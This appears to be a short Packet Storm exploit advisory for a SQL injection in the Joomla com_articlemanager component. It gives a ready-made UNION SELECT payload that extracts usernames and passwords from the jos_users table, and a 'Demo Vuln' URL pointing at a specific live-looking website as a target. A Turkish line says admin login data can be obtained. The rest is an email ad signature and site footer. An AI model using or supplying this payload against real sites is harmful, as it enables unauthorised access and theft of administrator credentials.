The Joomla Article Manager component suffers from a remote SQL injection vulnerability that allows for authentication bypass.
efab829103423956ef726413bbab774b1d91c7ee9fad2e446f377258f19ee484
########################################################################
# Joomla Component com_articlemanager SQL Injection Vulnerability
########################################################################
# Author :FL0RiX
#
# Name : com_articlemanager
#
# Download: http://yopensource.com/es/download?func=startdown&id=13
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://www.deticaforensics.com/index.php?option=com_articlemanager&Itemid=349&task=display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
########################################################################
_________________________________________________________________
Windows Live Hotmail: Arkadaþlarýnýz Facebook'taki güncellemelerinizi doðrudan Hotmail®'den alýr.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed